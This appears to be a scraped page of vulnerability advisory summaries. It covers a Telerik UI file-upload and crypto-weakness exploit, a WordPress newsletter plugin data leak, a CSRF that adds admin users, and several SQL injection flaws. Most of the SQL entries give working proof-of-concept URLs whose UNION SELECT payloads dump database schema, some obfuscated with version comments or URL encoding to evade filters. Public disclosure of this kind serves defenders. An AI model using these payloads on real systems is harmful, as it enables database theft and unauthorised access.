Telerik Web UI for ASP.NET AJAX RadAsyncUpload hardcoded keys / insecure direct object reference Arbitrary file upload Telerik fixed in June 2017 by removing default keys in versions R2 2017 SP1 (2017.2.621) and providing the ability to disable the RadAsyncUpload feature in R2 2017 SP2 (2017.2.711)
dp_crypto.py is an exploit for Telerik UI for ASP.NET AJAX DialogHandler Dialog cracker vulnerability. It is a cryptographic weakness in Telerik.Web.UI.dll which allows an attacker to decrypt the encrypted data. The exploit works on versions 2012.3.1308 thru 2017.1.118 (.NET 35, 40, 45).
Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed the vulnerability that allows an unauthenticated user to download the entire subscriber list with names and e-mail addresses.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/sellers_subcategories.php?IndustryID=[SQL] -105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+- 2) http://localhost/[PATH]/suppliers.php?IndustryID=[SQL]&CategoryID=[SQL]
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?id=[SQL] http://localhost/[PATH]/mobile_preview.php?id=[SQL] -714'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5--+-
Photography CMS 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) which allows an attacker to add an admin user to the application. The application does not verify the request and adds the user to the application. This vulnerability can be exploited by sending a malicious link to the victim and when the victim clicks on the link, the attacker can add an admin user to the application.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/category/[SQL] %2d%33%20%20%2f%2a%21%30%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%31%31%31%31%41%4c%4c%2a%2f%20%2f%2a%21%30%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%30%78%33%31%2c%30%78%33%32%2c%43%4f%4e%43%41%54%28%44%61%74%61%62%61%73%65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44%41%54%41%42%41%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%28%29%29%2d%2d%20%2d
The vulnerability allows an attacker to inject sql commands....
The vulnerability allows an attacker to inject sql commands into the vulnerable application.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/site_search.php?s_vehicletype=auto&s_order=[SQL]&s_row=[SQL]%35%31%20%2f%2a%21%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%35%35%35%35%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%30%35%35%35%35%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%2c%64%61%74%61%62%61%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d
Services By CQR